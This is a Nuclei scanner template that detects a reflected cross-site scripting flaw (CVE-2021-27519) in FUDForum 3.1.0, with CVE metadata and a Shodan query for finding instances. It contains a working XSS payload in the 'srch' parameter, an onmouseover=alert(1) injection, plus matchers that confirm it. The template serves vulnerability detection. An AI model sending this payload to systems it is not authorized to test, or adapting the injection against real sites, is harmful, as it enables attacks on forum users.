nuclei-templates/http/cves/2021/CVE-2021-27519.yaml

49 lines
1.4 KiB
YAML

id: CVE-2021-27519
info:
name: FUDForum 3.1.0 - Cross-Site Scripting
author: kh4sh3i
severity: medium
description: |
FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
reference:
- https://www.exploit-db.com/exploits/49942
- https://github.com/fudforum/FUDforum/issues/2
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27519
cwe-id: CWE-79
epss-score: 0.00189
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: 'http.html:"Powered by: FUDforum"'
verified: true
vendor: fudforum
product: fudforum
tags: xss,fudforum,edb,packetstorm,cve,cve2021
http:
- method: GET
path:
- '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'highlightSearchTerms("x" onmouseover=alert(1) x="");'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200